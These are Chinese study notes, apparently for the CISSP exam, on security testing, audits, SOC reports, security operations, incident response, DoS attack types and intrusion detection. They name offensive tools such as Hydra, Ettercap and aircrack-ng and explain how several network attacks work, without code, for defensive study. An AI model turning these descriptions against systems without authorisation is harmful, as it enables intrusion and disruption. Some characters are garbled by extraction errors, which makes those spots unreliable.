2、安全评估(Assessment)是对系统、应用或其他测试环境的综合评价。 安全评估包含安全测试工具(漏扫、渗透),也包括彻底审核(review) 威胁环境、当前和未来面临的风险和目标环境的价值。安全评估的产物 是一份评估报告。安全评估以非技术的语言᧿述评估结果,以具体建议 作为结论。 3、安全审计和安全评估类似,但必须由独立的审计员执行。测试和评估 都是给内部看的,审计的目的就是给第三方看的,阅读对象可能是董事 会、政府和监管人员和其他第三方。 4、审计分两种:内部审计和外部审计。 内部审计:首席审计执行官向总裁、CEO进行直接汇报,也可以直接向 董事会汇报。 外部审计:由外部审计公司执行,这些审计的外部效度很高(degree of external validity),也即通用程度较高。 5、信息安全专家通常被要求参加内部和外部审计,主要是ᨀ供相关信息, 接受面谈,ᨀ供文档,审计员有得知所有信息的权利,主管安全的工作 人员应该依从,如有需要咨询管理层。 6、漏洞扫᧿3种类型,网络发现、网络漏洞、WEB漏洞。 7、网络发现:TCP SYN扫᧿(半开放扫᧿)、TCP连接扫᧿(全连接,之 所以不用效率更高的半开扫᧿,是因为没有搞半开扫᧿的权限)、TCP ACK扫᧿、Xmas扫᧿(把FIN、PSH、URG标识都打开了) 8、网络扫᧿常见工具nmap,扫᧿结果:开放、关闭、过滤(无法确定 开放或关闭,因为防火墙有干扰) 9、网络漏扫会有假阳性FP和假阴性FN。可以使用Nessus漏洞扫᧿器工具。 10、WEB漏扫,会扫出SQL注入、XSS、XSRF(跨站请求伪造)等等。仍 然可以使用Nessus。在新系统上线前和新代码进入生产之前都应该做。 PCIDSS要求每年进行一次Web漏扫,或者安装WAF。 11、渗透测试常常使用Metasploit工具,该工具使用一门脚本语言允许自 动执行常见的攻击。 白盒测试需要ᨀ供目标系统的详细信息,使得攻击者节省很多侦查步 骤。 黑盒测试不ᨀ供任何信息,灰盒测试会得到部分信息。 渗透测试的报告要注意对漏洞数据的保存和发送。 12、最正式的代码评审过程称为Fagan检查(发汗),有6个步骤: Planning(计划)、Overview(概览)、Preparation(准备)、 Inspection(检查)、Rework(返工)、Follow-Up(后续行动) 13、正式的Fagan检验通常只存在于高度受限的环境中,其中代码如果有 缺陷可能产生灾难性影响。 14、大多数公司不使用Fagan这么严格的方法,他们做代码审查,一般的 做法包括: 在会上,开发人员过一遍代码,其他成员评审; 高级开发人员手工审查,上生产前签字确认; 上生产前,用自动审查工具过一遍。 15、动态测试包括使用综合事务(synthetic transactions )验证系统的性 能,这些是已知预期结果的脚本事物。比较结果有偏差就表明有Bug。 16、模糊测试(Fuzz testing)是一种专门的动态测试技术,产生大量不 同类型的输入,压到极限并发现以前未被发现的缺陷。模糊测试监控程 序的性能、崩溃、溢出或其他不可知结果。 17、模糊测试有两种: 变异模糊测试(Mutation/Dumb Fuzzing),主要是把以前的输入做一 些变化,改变字符或添加字符串。 智能模糊测试(Generational /Intelligent Fuzzing )开发数据模型并创 建新的模糊输入, zzuf工具可以将变异模糊测试自动化,自动将文本做一些变化。 18、接口测试:主要有三种接口测试: API测试(向外公开应用编程接口的服务要测试,比如restful接口); 用户界面(UI)测试,包括图形界面和CLI; 物理接口。 19、对于一些已知的风险,比如经常有一些黑客通过更改银行账户ID来 获取他人账号信息的,软件测试人员会使用误用案例测试(misuse case testing )或滥用用例测试(abuse case testing )来评估他们的软件对这 些已知风险的脆弱性。 20、测试覆盖率=已经测试的用例数/总用例数,准确计算覆盖率很难的, 因为总用例数需要穷举所有可能,所以解释覆盖率时要了解这些数都是 怎么来的。(总用例数:total number of use cases) 21、信息安全管理人员应该定期审查日志,以确保特权用户不滥用特权。 尤其是信息安全团队的人,很有可能接触到用户隐私。 22、账户管理审核可能是信息安全管理人员或内部审计师的职责,通常 要对高特权账户进行审核,一种方法: 1、管理人员要求管理员ᨀ供特权用户列表及其被授予的特权,管理人 员会在旁边看着,以防管理员做手脚。 2、管理员要求特权批准机构ᨀ供授权用户的列表。 3、对比两个列表发现问题。 24、由于没有时间对所有用户进行检查,此时可以抽样,如果在抽样中 没有发现问题,就认为它们代表所有账户。注意:只有随机抽样才是有 效的! 25、管理人员要定期检查数据备份的执行有效性:检查方法包括:审核 日志、检查散列值、对系统或文件进行实际恢复。 26、安全管理人员要持续监视关键性能指标和风险指标,比如漏洞数、 漏洞修复时间、受攻击数等等,识别了这些关键安全度量(key security metrics )后,管理人员就希望开发一个仪表盘来显示和时常观看。 OSG test: 1、突变测试(mutation testing) , 或称作突变分析、程序突变,它是用于 衡量软件测试的质量。突变测试对程序的源代码做小的改动,如果测试 代码没有觉察到这种小改动带来的错误,就说明这个测试是有问题的。 举例:正常程序:if (a < 0) Assert.fail(); 突变测试:a=-1;if (a < 0) Assert.fail(); 执行代码后没有抛出assertion,表明有问题。 2、Nikto是扫᧿web服务器的最佳选择。 THC Hydra:密码暴力破解。 Ettercap:中间人攻击。 3、OpenAVS是开源的漏扫,Nessus是闭源的;Nmap主要是扫端口的; MBSA是微软的基线安全分析器,microsoft baseline security analyzer 4、服务组织报告SSAE-16 SOC在2010年取代了SAS-70报告, SOC type 1 report only covers a point in time SOC type 2 跨度至少6个月, SSAE基于ISAE 3402(International Standard on Assurance Engagements),鉴证业务国际准则第3402号。 5、SOC1仅关于财务控制方面的,SOC2向业务合作伙伴、监管机构ᨀ供 组织的CIA,SO3能向更广的受众ᨀ供有关组织的服务运营的CIA报告。 SOC 1 reports report on controls over financial reporting SOC 2 reports cover security, availability, integrity, and privacy for business partners, regulators, and other similar organizations in detail that would not typically be provided to a broad audience. SOC 3 reports are intended to be shared with a broad community, often with a website seal, and support the organization’s claims about their ability to provide integrity, availability, and confidentiality. 6、WPA2的企业模式用radius,多次尝试后可能会被锁定,所以用 aircrack-ng进行口令攻击很难成功! Aircrack是破解WEP/WPA/WPA2加密的主流工具之一,现在排名第一。 Aircrack-ng套件包含的工具可用于捕获数据包、握手验证。可用来进行 暴力破解和字典攻击。 7、windows缺省不支持syslog 8、合成监测(synthetic monitoring,又称综合测试,又称主动监测 proactive)。其语境是测试,综合测试使用模拟的或者录制的交易,观 察系统在时间性、功能性上是否满足要求。所以,会监控数据库的性能、 网站的性能,会做流量捕获。 9、被动监控(Passive monitoring)监控的是实际交易,相当于查看生产 中实际发生的问题。 10、TCP SYN是半开扫᧿,需要高权限。TCP连接扫᧿不需要。 11、ITIL通常不用于审计。 12、安全内容自动化协议SCAP(Security Content Automation Protocol)是 用于安全缺陷和安全配置信息的开源规范。注意和漏洞、基线管理、配 置检查相关。 13、蓝牙主动扫᧿可以测出蓝牙PIN码的长度,可以测试蓝牙设备工作在 什么模式下。 14、函数、语句(statement,比如c=a+b)、branch分支,if条件,这些 都是覆盖测。 15、Nmap only scans 1000 TCP and UDP ports by default, including ports outside of the 0–1024 range of “well-known” ports. 16、XST攻击利用HTTP trace或track方法,并通过XSS,窃取用户的cookie。 17、TCP,控制位:字段长为 8 位,从左到右分别为 CWR、ECE、URG、ACK、PSH、RST、 SYN、FIN。这些控制标志也叫做控制位。 CWR:CWR 标志与后面的 ECE 标志都用于 IP 首部的 ECN 字段,ECE 标志为 1 时,则通 知对方已将拥塞窗口缩小; ECE:若其值为 1 则会通知对方,从对方到这边的网络有阻塞。在收到数据包的 IP 首部 中 ECN 为 1 时将 TCP 首部中的 ECE 设为 1.; URG:该位设为 1,表示包中有需要紧急处理的数据,对于需要紧急处理的数据,与后 面的紧急指针有关; ACK:该位设为 1,确认应答的字段有效,TCP规定除了最初建立连接时的 SYN 包之外 该位必须设为 1; PSH:该位设为 1,表示需要将收到的数据立刻传给上层应用协议,若设为 0,则先将 数据进行缓存; RST:该位设为 1,表示 TCP 连接出现异常必须强制断开连接; SYN:用于建立连接,该位设为 1,表示希望建立连接,并在其序列号的字段进行序列 号初值设定; FIN:该位设为 1,表示今后不再有数据发送,希望断开连接。 18、CVSS:通用漏洞评分系统 19、代码走查 code review,这三种都可以 : A. Email pass-around B. Over the shoulder C. Pair programming 20、S/MIME的加密邮件附件用P7S格式。 21、物理上的electronic access control就是电子锁,它解决了分配钥匙的 问题。 领域7-安全运营 第16章 管理安全运营 1、安全运营的目标时保障资产安全,主要是发现威胁和漏洞,然后赶紧 实施控制,以降低资产的风险。 主要注意:定期的安全检查和审计,如果你表现出了Due Care和Due diligence,出事时你的责任就会减少。 2、最小特权原则的基本假设:每个人都有明确的工作᧿述,因为没有工 作᧿述的话,就不知道用户需要什么样的特权。 3、最小特权主要考虑的是:需要给一个人他干活的权限,但只能给他最 小的干活的权限。职责(duty)分离的关注点在作案。最小特权 (privilege )的关注点在权限。 4、特权授予(Entitlement)通常是在第一次开通(first provisioning )账 户的时候所赋予的权限,也即创建账户的时候就分配资源和特权(采用 最小特权原则)。 5、用户可能在多个部门任职时,产生特权聚合(Aggregation)的问题, 所以在他们转部门的时候应该收回前一个部门的特权。 6、在两个安全域中,非传递信任(nontransitive trust)实施了最小特权 原则(并在某一时刻授予信任给单个域),如果是可传递信任(transitive) 的情况下,一定要检查好其信任关系。 非传递信任:两个安全域可能在同一个组织也可能在不同的组织之 间,非传递信任允许一个域中的主体访问另一个域中的客体。 传递信任:扩展了两个安全域以及它们的所有子域之间的信任关系。 在最小特权环境中,检查这些域的信任关系非常重要,尤其是在不同 的组织间创建域。 7、职责分离(separation of duties and responsibilities)的三种应用:特 权分离、职责划分、双人控制 8、特权分离(separation of privilege)的概念建立在颗粒化的权限和许可 上,能应用到user and service accounts。 每个服务有一个非人的账户(比如ftpserver),该账户有自己的特权, 这个特权仅仅满足其实现程序所需的功能。 9、职责分离(segregation of duties)确保没有单个人能控制作案,如果 想做案,需要两人或更多人共谋,这增加了被发现的风险。职责分离后, 多个主体可以互相校验操作,并且必须一起完成必要的工作。 比如,一人卖票一人查票,就能防范卖票的将钱收入自己口袋而不发 票,除非合谋。 再如,一人批准账单,另一人执行实际的付款,如果某人控制整个批 准和付款,他就容易批准伪造的发票来欺骗公司。 职责分离是一个人不能干两件事,双人控制是两个人干一件事。职责 分离容易导致勾结(因为本来不用勾结就能作案的)。 10、2002年的萨班斯-奥克斯利法案(SOX)适用于所有的上市公司(对 美国),SOX明确要求职责划分,这个法案是对很多公司金融丑闻的一种 响应。 11、最常见的职责分离是将安全指责从其他职责分离出来,也就是说, 负责审计、监控和安全审查的个人没有其他操作职责。否则可能监守自 盗。 12、下图是一个基本的职责划分控制矩阵,可以看出,安全管理员和所 有岗位互斥(除了补丁验证可以稍带做一下),应用程序员、数据库管 理员、数据库服务器管理员,互斥;预算分析员、收款账户、付款账户, 互斥;补丁部署和补丁验证,互斥。 11、双人控制(Two-Person control),主要是一个操作所需的特权和知 识,被人为的分隔成两个部分,比如开一个箱子需要两把钥匙。 再比 如公司两个人(CFO和CEO)来批准关键业务决策。 12、岗位轮换可以ᨀ供并行审查、减少欺骗、促进交叉培训。交叉培训 使得环境很少依赖任何单个个体。这个既是威慑,又是检测机制。 13、强制休假ᨀ供并行互审,有助于检测欺诈和共谋,该策略确保接替 工作至少一个星期。既是威慑,也是检测机制。 14、任何有高特权的管理员账户都应该被监控,对以下特权操作要当心: 访问审计日志、更改系统时间、管理用户账户、重启系统、 控制通信路径、备份和恢复系统、使用数据库恢复工具和log files、 配置接口、配置安全机制、使用操作系统control commands、运行脚本 /自动化工具。 15、使用自动化的工具监视这些特权操作,当管理员执行以上活动时, 要记录日志并send an alert, 审计时要看这些特权是否被滥用。 16、对于分类,除了系统的外部标记外,处理机密数据的系统必须有壁 纸和屏幕保护,目的是清晰的表明系统在处理机密数据。 17、服务级别协议(SLA)是组织和外部实体间的一份协定,SLA保证了 对性能被满足的期望,如果供应商满足不了期望会受到惩罚。 18、除了SLA外,还常常使用备忘录协议(memorandum of understanding ) 或者互联安全协议(Interconnection security agreement ),MOU记录了 两个实体朝着共同目标在一起工作的意图。MOU是非正式的,且不包含 对某个合作方不负责时的处罚。 ISA用来确定双方如何建立、维持和断开链接的信息,也会规定要使用的 Minimum的加密方法。 19、如果火灾导致电力故障,安全门自动解锁还是继续锁住,如果公司 认为资产比人的价值高,就会锁住,如果公司认为人比机器重要,就会 让安全门处于解锁状态。fail-secure Vs fail-safe(fail-open) 20、员工可以使用胁迫系统(Duress system)报警,简单的胁迫系统仅 仅需要按一下按钮就能发出求救信号。监控机构可能会给求救人员打电 话或发送一条文本信息,保安可能是不小心按的,就说一切OK,然而如 果犯罪分子控制了保安,保安需要发送密语。 21、员工旅游时,要在开门前检查敲门人的身份,如果房间包含免费的 食物,要给前台打电话确认酒店是否ᨀ供了该项服务。 22、管理硬件的方法,可以使用条形码、也可以使用无线射频识别 (RFID)标签。 23、SAN是含有多个存储设备的专用高速网络,价格居高不下,VSAN通 过虚拟化绕过了这些复杂性。 24、如果攻击者能够破解物理机,就可以访问托管在物理服务器上的虚 拟系统。许多虚拟化工具可以对虚拟机定期快照,以便及时进行数据恢 复。 25、如何界定消费者和云服务ᨀ供商(CSP)的界限?对于SaaS,消费者 不管理任何基于云的资产;对于Paas,消费者管理应用程序,CSP负责主 机和基础设施;对于IaaS,消费者维护操作系统和应用程序,CSP维护基 础设施,确保消费者获得系统。 26、基于云的资产。私有云可以用自己的资源创建,也可以从第三方租 赁资源并按照服务模型(IaaS、PaaS、IaaS)分隔维护要求,社区云 (community cloud )为两个或多个组织ᨀ供云资产,职责分工取决于谁 host资产和服务。混合云部署模型包括两个或两个以上的云组合。 27、Imation销售的IronKey闪存驱动器内置了多个保护级别,有多种认证 机制,确保只有授权用户可以访问驱动器上的数据,并且内置了机密功 能,如果被丢失,可以远程拒绝所有访问、禁用或自毁设备。 28、磁带因为腐蚀而容易损坏,最佳方法就是保存至少两份,一份onsite, 一份在安全的位置。 29、对于磁带介质: 为防止新介质设备沾染灰尘和污垢,应保持他们在原始密封包装内直 到使用; 避免将介质暴露在极端温度下、避免阳光、水分、潮湿; 不使用已经暴露在灰尘、污垢中以及摔落的介质; 运送时应在有温度控制的车辆中; 磁带应该适应24小时后再使用; 备份设备从出发点到异地的全程应当采取安全措施。 30、偷了手机后,贼会第一时间移除SIM卡,当把卡放回手机以获取数据 时,他们会在法拉第笼屏蔽室内操作,这些技术阻碍了远程擦除信号, 如果没有收到擦除已经成功的短信回复,数据就可能已经泄漏。 31、一些磁带会ᨀ示我们它可以重复使用250次或在理想条件下能保存30 年,我们要监控备份错误, 当磁带开始产生错误时,技术人员应停止使用。一旦备份介质达到其 MTTF,就要进行销毁。可以将其消磁,然后存储直到销毁(使用破碎机 或焚烧炉)。 32、消磁不能清除SSD内的数据,擦除命令也不能完全清楚数据,所以许 多组织直接销毁SSD,而不是仅将内容清除。 33、配置管理有助于确保系统处于安全一致的状态,使用的一种方法是 基线。基线是一个起点,是一个系统的启动配置(starting configuration),基线与检查列表同时产生,脚本和工具常用来实现基线, 使用自动方法可以减少手动基线的潜在错误。比如微软的组策略,可以 自动将组策略推到域中的所有计算机。 34、许多组织使用镜像来创建基线,管理员在计算机上安装操作系统和 所需的应用程序,测试一切OK后,然后用镜像制作软件创建Image,并存 在镜像服务器或介质中。然后根据需要将镜像部署到其他系统中。当用 户的系统损坏时,可以在几分钟内重新部署镜像。 35、镜像经常和自动化方法结合起来,先用镜像打个底,然后根据不同 部门的需要,用自动化的方法额外安装其他应用程序。 36、美国政府和微软合作,制作了美国政府配置基线USGCB,包括几个 不同的操作系统镜像。因为美国政府发现很多安全问题都是由于windows 系统配置错误引发的。 37、变更管理的主要目标时确保变更不会导致中断,变更管理流程要求 适当的人员在实施前审查和批准变更方案,并做记录。未授权的变更直 接影响到可用性。 38、变更管理过程ᨀ供控制、文档化、跟踪和审计所有的变更。 变更管理过程常见任务:请求变更、审查变更、批准/拒绝变更、计划和 实施变更(是有时间计划的)、文档化变更(通常需要改变配置管理文 档),文档化有利于回滚Reverse,而且有利于在其他系统上实现相同的 变更。 38、版本控制,主要是开发人员要注意,如果不能用版本控制系统来控 制变更,就会因为变更导致网站瘫痪。 39、配置文档确定当前系统的配置,定义了系统负责人和系统目标,并 且列出了所有应用于基线的变更。如今,这些信息都存储在数据库中, 但当断电时可能有些麻烦。 40、补丁管理, 1、评估补丁,当供应商发布补丁后,要先评估补丁是否适用 (Windows服务器没有开DNS功能就不要打DNS补丁); 2、测试补丁、确定补丁不会带来副作用; 3、批准补丁;用到变更管理过程。 4、部署补丁(很多组织采用自动化的方法部署补丁); 5、确认补丁已经部署。 41、由于微软经常在每月的第二个星期二发布补丁,所以有“补丁星期 二”的说法;攻击者如果发现有组织没有修补补丁,就会逆向补丁并利 用漏洞,所以有“漏洞星期三”之说。 42、发现漏洞后,管理层可以选择接受风险,施加控制后仍然存在的任 何风险都是剩余风险,剩余风险产生的任何损失是管理层的责任。 43、漏洞管理程序的两个常见要素是例行漏洞扫᧿(技术性的)和定期 脆弱性评估(涵盖更多的东西),注意:术语漏洞评估有时被用来表示 风险评估,狭义上的漏洞评估往往是风险评估的一部分,许多渗透测试 以漏洞评估开始,渗透测试经常包括社会工程学。也即漏洞评估并不仅 仅是技术性扫᧿,还包括审查(reviews)和审计(audits)。 43、漏洞评估通常包含漏洞扫᧿结果,但真正的评估将涵盖更多的东西。 例如,每年的漏洞评估可能会分析过去一年中的所有漏洞扫᧿报告,以 确定组织是否正在修复漏洞。如果在每一份漏洞扫᧿报告_上都有相同的 漏洞,我们脑海中就会自然而然产生一个问题,为什么这个漏洞没有被 修复? 44、MITRE维护CVE漏洞库,www.cve.mitre.org,创始人是MIT的研究工程 师。网站和MIT没有关系,是从美国政府获得资金维护漏洞库。CVE为漏 洞管理ᨀ供了便利。 45、纵观本章,主要讲了一些基本的运营原则,比如知其所需、最小特 权、职责和责任分离、岗位轮换、强制休假等等,然后讲了介质管理, 然后延伸到资产管理,包括虚拟资产,然后讲变更管理、配置管理、补 丁管理、漏洞管理。总的看下来,就是对人的管理、固定资产的管理、 系统的管理。 第17章 事件预防和响应 1、事件(incident)是任何对资产的CIA三性有负面影响的事情(Event), 在ITIL里面说“对IT服务来说,非计划的中断或质量降低”,而计算机安 全事件通常是指攻击结果,或指对用户来说是恶意行动的结果。 2、常见的安全事件:网络入侵企图、DoS企图、恶意软件发现、未经授 权的访问、违反安全策略的行为。 3、事件响应的步骤,检测、响应、缓解、报告、恢复、修复、经验教 训。 DRM-RRRL 4、事件响应不应包括对攻击者的反击。对别人发动攻击往往适得其反而 且非法,1是可能导致攻击的升级,攻击者会因为怨恨而周期性的攻击; 2、可能殃及无辜。 5、检测:仅仅从自动化工具那里收到警告,不能判定安全事件的发生。 IT人员需要调查确定他们是否为真实事件。IT专家是事件的第一响应者, 他们第一批到达现场。如果确认是安全事件,就开始响应。 6、响应:许多组织有指定的团队,CIRT或CSIRT(计算机(安全)事件响 应小组),只有重大的安全事件才激活该团队,小case一般不激活此团 队,《事件响应计划》会᧿述什么条件下激活这团队。 7、在处理事件的过程中,计算机不应该被关闭,因为要保护所有的数据 作为证据,如果计算机断电,临时文件和RAM中的数据将丢失,专家本 可以用专用工具ᨀ取数据的。 8、缓解:目标是限制事件的影响范围,如果发现受感染机器正在发数据, 可以禁用网卡或拔网线。(一旦略微缓解,立刻报告) 9、报告:报告包括组织内部和外部,轻微的事件不需要报告给CEO,但 严重的要报告到高层。根据法律,如果PII数据泄漏,必须报告,包括通 知受影响的个人。严重的安全事故,要考虑报告给官方机构。 10、许多事件没有报道,因为它们不被确认为事件,这是专业知识不够 的结果。应该确保人员有相关的培训。 11、恢复:收集了证据后,就是恢复系统到正常状态,可能重启就行, 可能需要重建,尤其是怀疑有恶意代码或代码被修改时,需要重建,重 建系统最重要的是确保配置正确。要查看配置管理和变更管理的相关文 档。 12、修复:要找到真正原因和根本原因,实施安全措施(比如打补丁), 可能要设计新的安全控制,以防再次发生。 13、经验教训:事件响应团队要写一份报告,会有一些相应的建议,管 理层决定哪些予以实施,哪些拒绝,但拒绝后的遗留风险由管理层负责。 14、部署预防性措施(Implementing preventive measures):基本的做法: 保持系统和应用程序更新; 删除不必要的服务; 使用IDS/IPS; 使用最新的反恶意软件; 使用防火墙。 15、理解攻击。无论何种形式,只要让系统无法执行正常活动的,都可 以被认为是DoS。DDoS通常使用僵尸网络。DRDoS是分布式反射拒绝服务, 采用反射方法,不直接攻击受害者,而是反射回来自其他来源,域名投 毒和smurf攻击都是这样。 16、SYN泛洪,攻击者只发SYN,而受害者发了SYN/ACK后等不到后续的 ACK包,通常等3分钟后放弃(管理员可以调这个时间,在一定程度上减 缓攻击)。注意通常每个SYN包都会有不同的源地址。 17、SYN Cookie是一种防御方法,它的原理是在接收到SYN包后,返回 SYN/ACK包时,不分配资源,而是根据这个SYN包的状态信息(主要是 源目IP-port信息和时间信息)做MAC得到一个cookie,这个cookie就作为 SYN/ACK包的初始序列号。当客户端返回ACK包时,服务器根据包头信 息计算cookie,与返回的确认序列号(cookie + 1)进行对比,如果相同,则 是一个正常连接,然后,分配资源,建立连接。 18、TCP重置攻击是通过FIN或RST数据包断开会话活动。 19、smurf通过伪造ICMP包来攻击,攻击者将Echo Request作为广播发给 网上的所有系统,并伪造源IP地址,所有的Echo response就会到这个被伪 造的IP上。这是一种放大(amplify )。已经很少见了。因为按RFC2644正 确配置路由后,路由器不能转发定向广播,网络便不能放大。防火墙也 往往拒绝ICMP,许多服务器能防止利用ICMP的任何攻击。 20、fraggle攻击类似smurf攻击,使用UDP的端口7和19,也是发UDP广播 报,用伪造的源IP,试图用大量响应攻击受害者。 21、ping泛洪:给受害者洪水般的ping请求,使用DDoS僵尸网络时效果 很明显,常见处理方式是阻断ICMP流量。 22、僵尸网络(Botnets),僵尸网络有4万台计算机很常见,过去,控制 百万计的系统也很常见。防范被感染为僵尸: 1、反恶意软件定期更新;2、补丁定期更新;3、浏览器及插件定期更 新。 两个僵尸网络:Gameover Zeus、Simda、Esthost(DNSChanger,更改 用的DNS设置指向恶意DNS服务器),这些都是著名的大型的僵尸网络。 23、死亡Ping主要用的是超大Ping包,一般Ping包是32~64字节,死亡 Ping用的是64KB的包。现在,这种攻击已经不奏效,补丁都打上了。 24、泪滴攻击,以一种无法重新组包的方式分割数据包,旧系统无法处 理这种情况,就会崩溃。现在没问题了,都打上补丁了。属于拒绝服务 攻击。 25、land攻击,使用受害者的IP同时作为源和目的IP,发送伪造SYN包, 使得系统不断对自己应答,会导致系统freeze, crash, or reboot,系统只要 过滤源目相同的IP就可以了。 26、零日漏洞:供应商不知情,所以并没有开发或发布补丁。即便知道 了漏洞,如果没有开发出来补丁(一般要几天或者几个月),也是零日 漏洞,因为公众不知道。如果发布了补丁但没有打,这不叫零日漏洞, 这叫没打补丁。 27、蜜罐和填充单元使得管理员有机会观察攻击并可能揭示使用零日漏 洞攻击的原理。 28、恶意代码是不必要的、未授权的或未知活动的脚本及程序,目前最 流行的方式是偷渡时下载,大多偷渡式下载(Drive-by download)利用 的是未安装补丁的系统的漏洞。其他方式包括电子邮件附件、USB闪存感 染等等。 29、安装恶意软件的另一种流行方式是使用付费的安装(Pay-perinstall),罪犯让网站挂恶意软件(伪装成反恶意软件),然后看多少人 安装,就给网站多少钱(每次安装从13美分到30美元不等)。 30、战争拨号(War dialing)是通过调制解调器去大规模拨打电话,通过 检测计算机载波音,来发现接受入站连接的的系统,新的战争拨号技术 使用VoIP拨号,除了发现调制解调器外,还可以检测传真机、语音信箱、 拨号音、人声,Metasploit纳入了WarVOX这个战争拨号软件。因为有些 组织仍然ᨀ供了员工外出时远程通过modem接入组织的系统。对策:强 身份认证;不存在未授权的调制解调器;回叫安全机制;限制协议;记 录呼叫日志。组织也可以使用战争拨号技术来发现组织内部未经授权私 自安装的调制解调器。 31、蓄意破坏(sabotage)发生在员工自身怀疑将被无故解雇或被解雇 仍然对系统有访问权的情况。 32、间谍(Espionage)的目的是向竞争对手或其他感兴趣组织(如境外 机构)披露或出售信息。反间谍活动:严格控制所有的非公开数据,严 格筛选新员工,有效跟踪所有员工的活动。 33、IPS具有IDS的所有功能,而且还可以采取额外的措施来阻止或防止入 侵,经常会看到入侵检测和防御系统的结合(IDPS)。有两大类,基于 知识的,和基于行为的。许多IDS使用两者相结合的方法。 基于知识的:需要签名,也就是特征库(signature database ),要定 期更新签名。特点是只对已知攻击有效。 基于行为的,将活动和正常性能的基线做对比,检测异常。 34、对于基于行为的检测:一开始要先建立正常活动的基线,积累足够 多了(一个星期即可建立起来),然后就可以检测恶意的。比如流量激 增、多次失败的登录尝试、工作时间以外的登录等等。这可以被认为是 专家系统或者伪人工智能系统。缺点是有大量的False Alert或称False Positive。 35、IDS的响应也分两种,被动响应Passive Response,主动响应Active Response,前者只是记录报警而已,后者会改变环境来阻止入侵(修改 ACL)。可以在防火墙前后各放一个被动式IDS,以检查防火墙的有效性, 通过对比IDS警报,来看看防火墙阻挡了那些攻击类型。 主动IDS可以说就是IPS,但要求是串接的才是。如果不是串接,就不是 IPS。 36、许多24小时的网络运营中心NOC都有中央监控屏幕,IDS警报会显示 在一个屏幕上。 37、主机型IDS(HIDS)监视单个计算机的活动,包括进程调用和日志 (包括系统、应用、安全、主机防火墙的)。主要优势是可以检测到主 机系统上的异常。安装HIDS的行为并不常见,主要是贵、消耗系统资源、 降低系统性能。 38、网络型IDS通过使用远程传感器来收集关键网络位置的数据,以检测 大型网络,传感器将数据发送到中央管理控制台。传感器一般接在镜像 端口上,思科交换机镜像端口叫SPAN端口(Switched Port Analyzer)。 39、NIDS通常能检测到攻击和将要发生的攻击,但往往不能ᨀ供有关攻 击成功的信息。 39、黑暗网络Darknets,在IDS语境下,黑暗网络指的是使用已分配、不 使用的IP地址的网络及其中用于捕获流量的设备,由于这段IP地址并不被 使用,所以不应该有人知道这段IP,也不会有人访问,一旦有访问,要 么是配置错误,要么就是非法的流量。 40、两个联网的蜜罐就是蜜网,蜜罐可以延迟入侵者的侵入时间,可以 放一些足以乱真的假文件,攻击者在蜜罐里面花费时间越长,管理员调 查的时间就越多,很多安全专家认为蜜罐能够有效防范零日攻击。通常 将蜜罐和蜜网放在虚拟网络里,可以用快照。 41、关于蜜罐,有个引诱(Enticement)和诱捕(Entrapment)的问题, 只要不是积极唆使访问者访问蜜罐然后控诉其入侵,就行,否则就是非 法诱捕。 42、伪漏洞通常被用在蜜罐中,用来迷惑攻击者,让他们以为成功穿透 系统。但并不是真的漏洞。蜜罐包含了伪漏洞和伪数据,都是为了诱惑 攻击者。 43、填充单元(Padded cell)与蜜罐类似,当IDS检测到入侵者时,会把 入侵者自动转移到填充单元,这里有实际的网络布局,但入侵者不能执 行任何恶意活动,也不能访问任何机密数据。可以理解为网络的模拟环 境。 44、警告框将基本的策略准则通知给用户和入侵者,ᨀ示他们将会被审 计和监控,措辞很重要,由于未授权用户也能看到,所以要写上“禁止 非法入内”(no trespassing )之类的话。也就是说,对授权和非授权用 户都通知到,如果有非授权活动,将被起诉。 45、反恶意软件(anti-malware)以前将注意力放在病毒上,现在扩展到 木马、蠕虫、间谍软件和rootkit等。一个系统上只安装一个反恶意软件, 否则会互相干扰。 46、有许多方法防范恶意软件,有的防火墙有内容过滤能力(病毒防火 墙),有的邮件服务器能过滤恶意代码。 47、用户的权限就是恶意应用的权限,用户权限很低的时候,连安装软 件都不可以。所以最小特权原则是有帮助的。 48、kim给larry发了个笑话,带毒,要教育kim,用公司网络发笑话是不 对的,larry也要教育,打开与工作无关的附件也不对。 49、白名单和黑名单都可以有效阻止未经授权的应用程序,iOS就是一个 典型的白名单例子,只能从苹果商店安装应用。但越狱的iOS设备,可以 对操作系统进行根级别的访问。 50、下一代防火墙有统一威胁管理(unified threat management ,UTM) 将几种防火墙的过滤功能结合了起来,包括包过滤防火墙、状态监测、 识别恶意流量、识别恶意软件、IDS/IPS。 51、如果组织外包了服务,那么组织应该向外部表明,这些第三方外包 公司,也是遵守安全要求的。比如PCI DSS会要求组织保证外包也能遵守 PCI DSS。换言之,组织不能外包责任。 52、做渗透测试(简称pentest)的时候,要避免业务中断,做测试前, 得到高级管理层的批准是非常重要的(很多人坚持书面批准,写明风 险)。如果可能,在测试系统上作渗透测试,避免影响生产。 53、渗透测试的目的:确定系统对攻击的容忍度;识别员工检测和响应 攻击的能力;识别可以增加的控制措施(比如加个WAF)。 54、内部员工在没有授权的情况下做pentest,组织可能会将他们的行为 视为非法攻击。 55、渗透测试类型:零知识黑盒测试,全知识白盒测试,部分知识灰盒 测试(比如只是知道网络结构和一些配置细节)。 56、白盒(又称水晶盒、透明盒)了解系统版本和打补丁情况,知道所 有配置,能访问源码, 白盒能更经济,更有效定位漏洞,发现漏洞时间也会比较短。 57、全知识团队(比如安全管理人员)有时候往往会有盲点,不会全面 测试每一种可能性。黑盒和灰盒会测得比较充分。 58、渗透测试经常使用社会工程学技术。教育往往是缓解这类攻击的最 有效方法。 59、测试报告是敏感信息。报告概述具体的漏洞、漏洞如何利用、建议。 60、道德黑客(Ethical Hacking)就是白帽子,就是合法搞渗透测试的人, 了解网络安全并知道如何破解安全性,却不为自己牟利的人,道德黑客 永远停留在法律允许范围内。道德黑客使用了黑客的原始含义。 61、日志将活动(event)记录到日志文件或数据库中,将日志(logging) 和监控(monitoring)联合起来,可以ᨀ供安全的可问责性。 62、识别和认证(identification and authentication )是可问责性的先决条 件,否则有人冒充Darril删除文件,Darril可能就会面临错误指控。 63、通常的日志类型:安全日志、系统日志、应用程序日志、防火墙日 志、代理日志、变更日志 安全日志:记录对资源的访问,如文件、文件夹、打印机等,访问、修改、删 除文件时,安全日志都能够记录下来。 系统日志:系统、服务的开启、关闭等等,主要是怕有人在系统停机和重启之 间,可能会用光盘或U盘启动系统作案,或者把服务关了作案。 应用程序日志:开发人员可以选择在应用程序日志中做哪些记录。 防火墙日志:允许的流量或阻止的流量都可以记录。防火墙日志一般不记录数 据包的实际内容。 代理日志:主要是代理服务器的日志,代理日志记录了哪些用户访问了哪些网 站,用了多长时间。 